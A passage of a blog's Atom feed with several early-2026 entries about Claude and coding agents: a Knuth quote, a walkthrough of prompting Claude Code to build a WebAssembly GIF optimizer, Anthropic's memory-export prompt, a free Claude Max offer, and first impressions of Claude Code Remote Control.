    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/algorithms"&gt;algorithms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/computer-science"&gt;computer-science&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/javascript"&gt;javascript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/sorting"&gt;sorting&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/explorables"&gt;explorables&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/vibe-coding"&gt;vibe-coding&lt;/a&gt;&lt;/p&gt;



</summary><category term="algorithms"/><category term="computer-science"/><category term="javascript"/><category term="sorting"/><category term="ai"/><category term="explorables"/><category term="generative-ai"/><category term="llms"/><category term="claude"/><category term="vibe-coding"/></entry><entry><title>Quoting Donald Knuth</title><link href="https://simonwillison.net/2026/Mar/3/donald-knuth/#atom-tag" rel="alternate"/><published>2026-03-03T23:59:04+00:00</published><updated>2026-03-03T23:59:04+00:00</updated><id>https://simonwillison.net/2026/Mar/3/donald-knuth/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://www-cs-faculty.stanford.edu/~knuth/papers/claude-cycles.pdf"&gt;&lt;p&gt;Shock! Shock! I learned yesterday that an open problem I'd been working on for several weeks had just been solved by Claude Opus 4.6 - Anthropic's hybrid reasoning model that had been released three weeks earlier! It seems that I'll have to revise my opinions about "generative AI" one of these days. What a joy it is to learn not only that my conjecture has a nice solution but also to celebrate this dramatic advance in automatic deduction and creative problem solving.&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://www-cs-faculty.stanford.edu/~knuth/papers/claude-cycles.pdf"&gt;Donald Knuth&lt;/a&gt;, Claude's Cycles&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-reasoning"&gt;llm-reasoning&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/november-2025-inflection"&gt;november-2025-inflection&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/donald-knuth"&gt;donald-knuth&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="llm-reasoning"/><category term="november-2025-inflection"/><category term="donald-knuth"/></entry><entry><title>GIF optimization tool using WebAssembly and Gifsicle</title><link href="https://simonwillison.net/guides/agentic-engineering-patterns/gif-optimization/#atom-tag" rel="alternate"/><published>2026-03-02T16:35:10+00:00</published><updated>2026-03-02T16:35:10+00:00</updated><id>https://simonwillison.net/guides/agentic-engineering-patterns/gif-optimization/#atom-tag</id><summary type="html">
    &lt;p&gt;&lt;em&gt;&lt;a href="https://simonwillison.net/guides/agentic-engineering-patterns/"&gt;Agentic Engineering Patterns&lt;/a&gt; &amp;gt;&lt;/em&gt;&lt;/p&gt;
    &lt;p&gt;I like to include animated GIF demos in my online writing, often recorded using &lt;a href="https://www.cockos.com/licecap/"&gt;LICEcap&lt;/a&gt;. There's an example in the &lt;a href="https://simonwillison.net/guides/agentic-engineering-patterns/interactive-explanations/"&gt;Interactive explanations&lt;/a&gt; chapter.&lt;/p&gt;
&lt;p&gt;These GIFs can be pretty big. I've tried a few tools for optimizing GIF file size and my favorite is &lt;a href="https://github.com/kohler/gifsicle"&gt;Gifsicle&lt;/a&gt; by Eddie Kohler. It compresses GIFs by identifying regions of frames that have not changed and storing only the differences, and can optionally reduce the GIF color palette or apply visible lossy compression for greater size reductions.&lt;/p&gt;
&lt;p&gt;Gifsicle is written in C and the default interface is a command line tool. I wanted a web interface so I could access it in my browser and visually preview and compare the different settings.&lt;/p&gt;
&lt;p&gt;I prompted Claude Code for web (from my iPhone using the Claude iPhone app) against my &lt;a href="https://github.com/simonw/tools"&gt;simonw/tools&lt;/a&gt; repo with the following:&lt;/p&gt;
&lt;pre&gt;gif-optimizer.html

Compile gifsicle to WASM, then build a web page that lets you open or drag-drop an animated GIF onto it and it then shows you that GIF compressed using gifsicle with a number of different settings, each preview with the size and a download button

Also include controls for the gifsicle options for manual use - each preview has a “tweak these settings” link which sets those manual settings to the ones used for that preview so the user can customize them further

Run “uvx rodney –help” and use that tool to tray your work - use this GIF for testing https://static.simonwillison.net/static/2026/animated-word-cloud-demo.gif&lt;/pre&gt;
&lt;p&gt;Here's &lt;a href="https://tools.simonwillison.net/gif-optimizer"&gt;what it built&lt;/a&gt;, plus an animated GIF demo that I optimized using the tool:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Animation. I drop on a GIF and the tool updates the page with a series of optimized versions under different settings. I eventually select Tweak settings on one of them, scroll to the bottom, adjust some sliders and download the result." src="https://static.simonwillison.net/static/2026/demo2-32-colors-lossy.gif" /&gt;&lt;/p&gt;
&lt;p&gt;Let's address that prompt piece by piece.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;gif-optimizer.html&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;The first line simply tells it the name of the file I want to create. Just a filename is enough here - I know that when Claude runs "ls" on the repo it will understand that every file is a different tool.&lt;/p&gt;
&lt;p&gt;My &lt;a href="https://github.com/simonw/tools"&gt;simonw/tools&lt;/a&gt; repo currently lacks a &lt;code&gt;CLAUDE.md&lt;/code&gt; or &lt;code&gt;AGENTS.md&lt;/code&gt; file. I've found that agents pick up enough of the gist of the repo just from scanning the existing file tree and looking at relevant code in existing files.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Compile gifsicle to WASM, then build a web page that lets you open or drag-drop an animated GIF onto it and it then shows you that GIF compressed using gifsicle with a number of different settings, each preview with the size and a download button&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I'm making a bunch of assumptions here about Claude's existing knowledge, all of which paid off.&lt;/p&gt;
&lt;p&gt;Gifsicle is nearly 30 years old now and is a widely used piece of software - I was confident that referring to it by name would be enough for Claude to find the code.&lt;/p&gt;
&lt;p&gt;"&lt;code&gt;Compile gifsicle to WASM&lt;/code&gt;" is doing a &lt;em&gt;lot&lt;/em&gt; of work here.&lt;/p&gt;
&lt;p&gt;WASM is short for &lt;a href="https://webassembly.org/"&gt;WebAssembly&lt;/a&gt;, the technology that lets browsers run compiled code safely in a sandbox.&lt;/p&gt;
&lt;p&gt;Compiling a project like Gifsicle to WASM is not a trivial operation, involving a complex toolchain usually involving the &lt;a href="https://emscripten.org/"&gt;Emscripten&lt;/a&gt; project. It often requires a lot of trial and error to get everything working.&lt;/p&gt;
&lt;p&gt;Coding agents are fantastic at trial and error! They can often brute force their way to a solution where I would have given up after the fifth inscrutable compiler error.&lt;/p&gt;
&lt;p&gt;I've seen Claude Code figure out WASM builds many times before, so I was quite confident this would work.&lt;/p&gt;
&lt;p&gt;"&lt;code&gt;then build a web page that lets you open or drag-drop an animated GIF onto it&lt;/code&gt;" describes a pattern I've used in a lot of my other tools.&lt;/p&gt;
&lt;p&gt;HTML file uploads work fine for selecting files, but a nicer UI, especially on desktop, is to allow users to drag and drop files into a prominent drop zone on a page.&lt;/p&gt;
&lt;p&gt;Setting this up involves a bit of JavaScript to process the events and some CSS for the drop zone. It's not complicated but it's enough extra work that I might not normally add it myself. With a prompt it's almost free.&lt;/p&gt;
&lt;p&gt;Here's the resulting UI - which was influenced by Claude taking a peek at my existing &lt;a href="https://tools.simonwillison.net/image-resize-quality"&gt;image-resize-quality&lt;/a&gt; tool:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of a web application titled &amp;quot;GIF Optimizer&amp;quot; with subtitle &amp;quot;Powered by gifsicle compiled to WebAssembly — all processing happens in your browser&amp;quot;. A large dashed-border drop zone reads &amp;quot;Drop an animated GIF here or click to select&amp;quot;. Below is a text input with placeholder &amp;quot;Or paste a GIF URL...&amp;quot; and a blue &amp;quot;Load URL&amp;quot; button. Footer text reads &amp;quot;Built with gifsicle by Eddie Kohler, compiled to WebAssembly. gifsicle is released under the GNU General Public License, version 2.&amp;quot;" src="https://static.simonwillison.net/static/2026/gif-optimizer.jpg" /&gt;&lt;/p&gt;
&lt;p&gt;I didn't ask for the GIF URL input and I'm not keen on it, because it only works against URLs to GIFs that are served with open CORS headers. I'll probably remove that in a future update.&lt;/p&gt;
&lt;p&gt;"&lt;code&gt;then shows you that GIF compressed using gifsicle with a number of different settings, each preview with the size and a download button&lt;/code&gt;" describes the key feature of the application.&lt;/p&gt;
&lt;p&gt;I didn't bother defining the collection of settings I wanted - in my experience Claude has good enough taste at picking those for me, and we can always change them if its first guesses don't work.&lt;/p&gt;
&lt;p&gt;Showing the size is important since this is all about optimizing for size.&lt;/p&gt;
&lt;p&gt;I know from past experience that asking for a "download button" gets a button with the right HTML and JavaScript mechanisms set up such that clicking it provides a file save dialog, which is a nice convenience over needing to right-click-save-as.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Also include controls for the gifsicle options for manual use - each preview has a “tweak these settings” link which sets those manual settings to the ones used for that preview so the user can customize them further&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is a pretty clumsy prompt - I was typing it in my phone after all - but it expressed my intention well enough for Claude to build what I wanted. &lt;/p&gt;
&lt;p&gt;Here's what that looks like in the resulting tool, this screenshot showing the mobile version. Each image has a "Tweak these settings" button which, when clicked, updates this set of manual settings and sliders:&lt;/p&gt;
&lt;p&gt;&lt;img alt="Screenshot of a GIF Optimizer results and settings panel. At top, results show &amp;quot;110.4 KB (original: 274.0 KB) — 59.7% smaller&amp;quot; in green, with a blue &amp;quot;Download&amp;quot; button and a &amp;quot;Tweak these settings&amp;quot; button. Below is a &amp;quot;Manual Settings&amp;quot; card containing: &amp;quot;Optimization level&amp;quot; dropdown set to &amp;quot;-O3 (aggressive)&amp;quot;, &amp;quot;Lossy (0 = off, higher = more loss)&amp;quot; slider set to 0, &amp;quot;Colors (0 = unchanged)&amp;quot; slider set to 0, &amp;quot;Color reduction method&amp;quot; dropdown set to &amp;quot;Default&amp;quot;, &amp;quot;Scale (%)&amp;quot; slider set to 100%, &amp;quot;Dither&amp;quot; dropdown set to &amp;quot;Default&amp;quot;, and a blue &amp;quot;Optimize with these settings&amp;quot; button." src="https://static.simonwillison.net/static/2026/gif-optimizer-tweak.jpg" /&gt;&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Run “uvx rodney --help” and use that tool to tray your work - use this GIF for testing https://static.simonwillison.net/static/2026/animated-word-cloud-demo.gif&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;Coding agents work &lt;em&gt;so much better&lt;/em&gt; if you make sure they have the ability to test their code while they are working.&lt;/p&gt;
&lt;p&gt;There are many different ways to test a web interface - &lt;a href="https://playwright.dev/"&gt;Playwright&lt;/a&gt; and &lt;a href="https://www.selenium.dev/"&gt;Selenium&lt;/a&gt; and &lt;a href="https://agent-browser.dev/"&gt;agent-browser&lt;/a&gt; are three solid options.&lt;/p&gt;
&lt;p&gt;&lt;a href="https://github.com/simonw/rodney"&gt;Rodney&lt;/a&gt; is a browser automation tool I built myself, which is quick to install and has &lt;code&gt;--help&lt;/code&gt; output that's designed to teach an agent everything it needs to know to use the tool.&lt;/p&gt;
&lt;p&gt;This worked great - in &lt;a href="https://claude.ai/code/session_01C8JpE3yQpwHfBCFni4ZUc4"&gt;the session transcript&lt;/a&gt; you can see Claude using Rodney and fixing some minor bugs that it spotted, for example:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;The CSS &lt;code&gt;display: none&lt;/code&gt; is winning over the inline style reset. I need to set &lt;code&gt;display: 'block'&lt;/code&gt; explicitly.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;h2 id="the-follow-up-prompts"&gt;The follow-up prompts&lt;/h2&gt;
&lt;p&gt;When I'm working with Claude Code I usually keep an eye on what it's doing so I can redirect it while it's still in flight. I also often come up with new ideas while it's working which I then inject into the queue.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Include the build script and diff against original gifsicle code in the commit in an appropriate subdirectory&lt;/code&gt;&lt;/p&gt;
&lt;p&gt;&lt;code&gt;The build script should clone the gifsicle repo to /tmp and switch to a known commit before applying the diff - so no copy of gifsicle in the commit but all the scripts needed to build the wqsm&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I added this when I noticed it was putting a &lt;em&gt;lot&lt;/em&gt; of effort into figuring out how to get Gifsicle working with WebAssembly, including patching the original source code. Here's &lt;a href="https://github.com/simonw/tools/blob/main/lib/gifsicle/gifsicle-wasm.patch"&gt;the patch&lt;/a&gt; and &lt;a href="https://github.com/simonw/tools/blob/main/lib/gifsicle/build.sh"&gt;the build script&lt;/a&gt; it added to the repo.&lt;/p&gt;
&lt;p&gt;I knew there was a pattern in that repo already for where supporting files lived but I couldn't remember what that pattern was. Saying "in an appropriate subdirectory" was enough for Claude to figure out where to put it - it found and used the existing &lt;a href="https://github.com/simonw/tools/tree/main/lib"&gt;lib/ directory&lt;/a&gt;.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;You should include the wasm bundle&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This probably wasn't necessary, but I wanted to make absolutely sure that the compiled WASM file (which turned out &lt;a href="https://github.com/simonw/tools/blob/main/lib/gifsicle/gifsicle.wasm"&gt;to be 233KB&lt;/a&gt;) was committed to the repo. I serve &lt;code&gt;simonw/tools&lt;/code&gt; via GitHub Pages at &lt;a href="https://tools.simonwillison.net/"&gt;tools.simonwillison.net&lt;/a&gt; and I wanted it to work without needing to be built locally.&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;&lt;code&gt;Make sure the HTML page credits gifsicle and links to the repo&lt;/code&gt;&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;This is just polite! I often build WebAssembly wrappers around other people's open source projects and I like to make sure they get credit in the resulting page.&lt;/p&gt;
&lt;p&gt;Claude added this to the footer of the tool:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Built with &lt;a href="https://github.com/kohler/gifsicle"&gt;gifsicle&lt;/a&gt; by Eddie Kohler, compiled to WebAssembly. gifsicle is released under the GNU General Public License, version 2.&lt;/p&gt;
&lt;/blockquote&gt;
    
        &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/gif"&gt;gif&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/tools"&gt;tools&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/webassembly"&gt;webassembly&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-engineering"&gt;prompt-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/agentic-engineering"&gt;agentic-engineering&lt;/a&gt;&lt;/p&gt;
    

</summary><category term="gif"/><category term="tools"/><category term="webassembly"/><category term="claude"/><category term="llms"/><category term="prompt-engineering"/><category term="ai"/><category term="generative-ai"/><category term="coding-agents"/><category term="claude-code"/><category term="agentic-engineering"/></entry><entry><title>February sponsors-only newsletter</title><link href="https://simonwillison.net/2026/Mar/2/february-newsletter/#atom-tag" rel="alternate"/><published>2026-03-02T14:53:15+00:00</published><updated>2026-03-02T14:53:15+00:00</updated><id>https://simonwillison.net/2026/Mar/2/february-newsletter/#atom-tag</id><summary type="html">
    &lt;p&gt;I just sent the February edition of my &lt;a href="https://github.com/sponsors/simonw/"&gt;sponsors-only monthly newsletter&lt;/a&gt;. If you are a sponsor (or if you start a sponsorship now) you can &lt;a href="https://github.com/simonw-private/monthly/blob/main/2026-02-february.md"&gt;access it here&lt;/a&gt;. In this month's newsletter:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;More OpenClaw, and Claws in general&lt;/li&gt;
&lt;li&gt;I started a not-quite-a-book about Agentic Engineering&lt;/li&gt;
&lt;li&gt;StrongDM, Showboat and Rodney&lt;/li&gt;
&lt;li&gt;Kākāpō breeding season&lt;/li&gt;
&lt;li&gt;Model releases&lt;/li&gt;
&lt;li&gt;What I'm using, February 2026 edition&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Here's &lt;a href="https://gist.github.com/simonw/36f567d1b3f8bb4ab4d872d477fbb295"&gt;a copy of the January newsletter&lt;/a&gt; as a preview of what you'll get. Pay $10/month to stay a month ahead of the free copy!&lt;/p&gt;
&lt;p&gt;I use Claude as a proofreader for spelling and grammar via &lt;a href="https://simonwillison.net/guides/agentic-engineering-patterns/prompts/#proofreader"&gt;this prompt&lt;/a&gt; which also asks it to "Spot any logical errors or factual mistakes". I'm delighted to report that Claude Opus 4.6 called me out on this one:&lt;/p&gt;
&lt;p&gt;&lt;img alt="5. &amp;quot;No new chicks for four years (due to a lack of fruiting rimu trees)&amp;quot;
The phrasing &amp;quot;lack of fruiting rimu trees&amp;quot; is slightly imprecise. The issue isn't that rimu trees failed to fruit at all, but that there was no mass fruiting (masting) event, which is the specific trigger for kākāpō breeding. Consider &amp;quot;due to a lack of rimu masting&amp;quot; or &amp;quot;due to a lack of mass rimu fruiting.&amp;quot;" src="https://static.simonwillison.net/static/2026/claude-fact-check.jpg" /&gt;&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/newsletter"&gt;newsletter&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/kakapo"&gt;kakapo&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;&lt;/p&gt;



</summary><category term="newsletter"/><category term="kakapo"/><category term="claude"/></entry><entry><title>Quoting claude.com/import-memory</title><link href="https://simonwillison.net/2026/Mar/1/claude-import-memory/#atom-tag" rel="alternate"/><published>2026-03-01T11:21:45+00:00</published><updated>2026-03-01T11:21:45+00:00</updated><id>https://simonwillison.net/2026/Mar/1/claude-import-memory/#atom-tag</id><summary type="html">
    &lt;blockquote cite="https://claude.com/import-memory"&gt;&lt;p&gt;&lt;code&gt;I'm moving to another service and need to export my data. List every memory you have stored about me, as well as any context you've learned about me from past conversations. Output everything in a single code block so I can easily copy it. Format each entry as: [date saved, if available] - memory content. Make sure to cover all of the following — preserve my words verbatim where possible: Instructions I've given you about how to respond (tone, format, style, 'always do X', 'never do Y'). Personal details: name, location, job, family, interests. Projects, goals, and recurring topics. Tools, languages, and frameworks I use. Preferences and corrections I've made to your behavior. Any other stored context not covered above. Do not summarize, group, or omit any entries. After the code block, confirm whether that is the complete set or if any remain.&lt;/code&gt;&lt;/p&gt;&lt;/blockquote&gt;
&lt;p class="cite"&gt;&amp;mdash; &lt;a href="https://claude.com/import-memory"&gt;claude.com/import-memory&lt;/a&gt;, Anthropic's "import your memories to Claude" feature is a prompt&lt;/p&gt;

    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/prompt-engineering"&gt;prompt-engineering&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llm-memory"&gt;llm-memory&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="prompt-engineering"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="llm-memory"/></entry><entry><title>Free Claude Max for (large project) open source maintainers</title><link href="https://simonwillison.net/2026/Feb/27/claude-max-oss-six-months/#atom-tag" rel="alternate"/><published>2026-02-27T18:08:22+00:00</published><updated>2026-02-27T18:08:22+00:00</updated><id>https://simonwillison.net/2026/Feb/27/claude-max-oss-six-months/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://claude.com/contact-sales/claude-for-oss"&gt;Free Claude Max for (large project) open source maintainers&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
Anthropic are now offering their $200/month Claude Max 20x plan for free to open source maintainers... for six months... and you have to meet the following criteria:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Maintainers:&lt;/strong&gt; You're a primary maintainer or core team member of a public repo with 5,000+ GitHub stars &lt;em&gt;or&lt;/em&gt; 1M+ monthly NPM downloads. You've made commits, releases, or PR reviews within the last 3 months.&lt;/li&gt;
&lt;li&gt;&lt;strong&gt;Don't quite fit the criteria&lt;/strong&gt; If you maintain something the ecosystem quietly depends on, apply anyway and tell us about it.&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;
&lt;p&gt;Also in the small print: "Applications are reviewed on a rolling basis. We accept up to 10,000 contributors".

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://news.ycombinator.com/item?id=47178371"&gt;Hacker News&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/open-source"&gt;open-source&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;&lt;/p&gt;



</summary><category term="open-source"/><category term="ai"/><category term="generative-ai"/><category term="llms"/><category term="anthropic"/><category term="claude"/></entry><entry><title>Claude Code Remote Control</title><link href="https://simonwillison.net/2026/Feb/25/claude-code-remote-control/#atom-tag" rel="alternate"/><published>2026-02-25T17:33:24+00:00</published><updated>2026-02-25T17:33:24+00:00</updated><id>https://simonwillison.net/2026/Feb/25/claude-code-remote-control/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://code.claude.com/docs/en/remote-control"&gt;Claude Code Remote Control&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
New Claude Code feature dropped yesterday: you can now run a "remote control" session on your computer and then use the Claude Code for web interfaces (on web, iOS and native desktop app) to send prompts to that session.&lt;/p&gt;
&lt;p&gt;It's a little bit janky right now. Initially when I tried it I got the error "Remote Control is not enabled for your account. Contact your administrator." (but I &lt;em&gt;am&lt;/em&gt; my administrator?) - then I logged out and back into the Claude Code terminal app and it started working:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;claude remote-control
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;You can only run one session on your machine at a time. If you upgrade the Claude iOS app it then shows up as "Remote Control Session (Mac)" in the Code tab.&lt;/p&gt;
&lt;p&gt;It appears not to support the &lt;code&gt;--dangerously-skip-permissions&lt;/code&gt; flag (I passed that to &lt;code&gt;claude remote-control&lt;/code&gt; and it didn't reject the option, but it also appeared to have no effect) - which means you have to approve every new action it takes.&lt;/p&gt;
&lt;p&gt;I also managed to get it to a state where every prompt I tried was met by an API 500 error.&lt;/p&gt;
&lt;p style="text-align: center;"&gt;&lt;img src="https://static.simonwillison.net/static/2026/vampire-remote.jpg" alt="Screenshot of a &amp;quot;Remote Control session&amp;quot; (Mac:dev:817b) chat interface. User message: &amp;quot;Play vampire by Olivia Rodrigo in music app&amp;quot;. Response shows an API Error: 500 {&amp;quot;type&amp;quot;:&amp;quot;error&amp;quot;,&amp;quot;error&amp;quot;:{&amp;quot;type&amp;quot;:&amp;quot;api_error&amp;quot;,&amp;quot;message&amp;quot;:&amp;quot;Internal server error&amp;quot;},&amp;quot;request_id&amp;quot;:&amp;quot;req_011CYVBLH9yt2ze2qehrX8nk&amp;quot;} with a &amp;quot;Try again&amp;quot; button. Below, the assistant responds: &amp;quot;I&amp;#39;ll play &amp;quot;Vampire&amp;quot; by Olivia Rodrigo in the Music app using AppleScript.&amp;quot; A Bash command panel is open showing an osascript command: osascript -e &amp;#39;tell application &amp;quot;Music&amp;quot; activate set searchResults to search playlist &amp;quot;Library&amp;quot; for &amp;quot;vampire Olivia Rodrigo&amp;quot; if (count of searchResults) &amp;gt; 0 then play item 1 of searchResults else return &amp;quot;Song not found in library&amp;quot; end if end tell&amp;#39;" style="max-width: 80%;" /&gt;&lt;/p&gt;

&lt;p&gt;Restarting the program on the machine also causes existing sessions to start returning mysterious API errors rather than neatly explaining that the session has terminated.&lt;/p&gt;
&lt;p&gt;I expect they'll iron out all of these issues relatively quickly. It's interesting to then contrast this to solutions like OpenClaw, where one of the big selling points is the ability to control your personal device from your phone.&lt;/p&gt;
&lt;p&gt;Claude Code still doesn't have a documented mechanism for running things on a schedule, which is the other killer feature of the Claw category of software.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Update&lt;/strong&gt;: I spoke too soon: also today Anthropic announced &lt;a href="https://support.claude.com/en/articles/13854387-schedule-recurring-tasks-in-cowork"&gt;Schedule recurring tasks in Cowork&lt;/a&gt;, Claude Code's &lt;a href="https://simonwillison.net/2026/Jan/12/claude-cowork/"&gt;general agent sibling&lt;/a&gt;. These do include an important limitation:&lt;/p&gt;
&lt;blockquote&gt;
&lt;p&gt;Scheduled tasks only run while your computer is awake and the Claude Desktop app is open. If your computer is asleep or the app is closed when a task is scheduled to run, Cowork will skip the task, then run it automatically once your computer wakes up or you open the desktop app again.&lt;/p&gt;
&lt;/blockquote&gt;
&lt;p&gt;I really hope they're working on a Cowork Cloud product.

    &lt;p&gt;&lt;small&gt;&lt;/small&gt;Via &lt;a href="https://twitter.com/claudeai/status/2026418433911603668"&gt;@claudeai&lt;/a&gt;&lt;/small&gt;&lt;/p&gt;


    &lt;p&gt;Tags: &lt;a href="https://simonwillison.net/tags/ai"&gt;ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/generative-ai"&gt;generative-ai&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/applescript"&gt;applescript&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/llms"&gt;llms&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/anthropic"&gt;anthropic&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude"&gt;claude&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/coding-agents"&gt;coding-agents&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/claude-code"&gt;claude-code&lt;/a&gt;, &lt;a href="https://simonwillison.net/tags/openclaw"&gt;openclaw&lt;/a&gt;&lt;/p&gt;



</summary><category term="ai"/><category term="generative-ai"/><category term="applescript"/><category term="llms"/><category term="anthropic"/><category term="claude"/><category term="coding-agents"/><category term="claude-code"/><category term="openclaw"/></entry><entry><title>The Claude C Compiler: What It Reveals About the Future of Software</title><link href="https://simonwillison.net/2026/Feb/22/ccc/#atom-tag" rel="alternate"/><published>2026-02-22T23:58:43+00:00</published><updated>2026-02-22T23:58:43+00:00</updated><id>https://simonwillison.net/2026/Feb/22/ccc/#atom-tag</id><summary type="html">
    
&lt;p&gt;&lt;strong&gt;&lt;a href="https://www.modular.com/blog/the-claude-c-compiler-what-it-reveals-about-the-future-of-software"&gt;The Claude C Compiler: What It Reveals About the Future of Software&lt;/a&gt;&lt;/strong&gt;&lt;/p&gt;
On February 5th Anthropic's Nicholas Carlini wrote about a project to use &lt;a href="https://www.anthropic.com/engineering/building-c-compiler"&gt;parallel Claudes to build a C compiler&lt;/a&gt; on top of the brand new Opus 4.6&lt;/p&gt;
&lt;p&gt;Chris Lattner (Swift, LLVM, Clang, Mojo) knows more about C compilers than most. He just published this review of the code.&lt;/p&gt;
&lt;p&gt;Some points that stood out to me:&lt;/p&gt;
&lt;blockquote&gt;
&lt;ul&gt;
&lt;li&gt;Good software depends on judgment, communication, and clear abstraction. AI has amplified this.&lt;/li&gt;
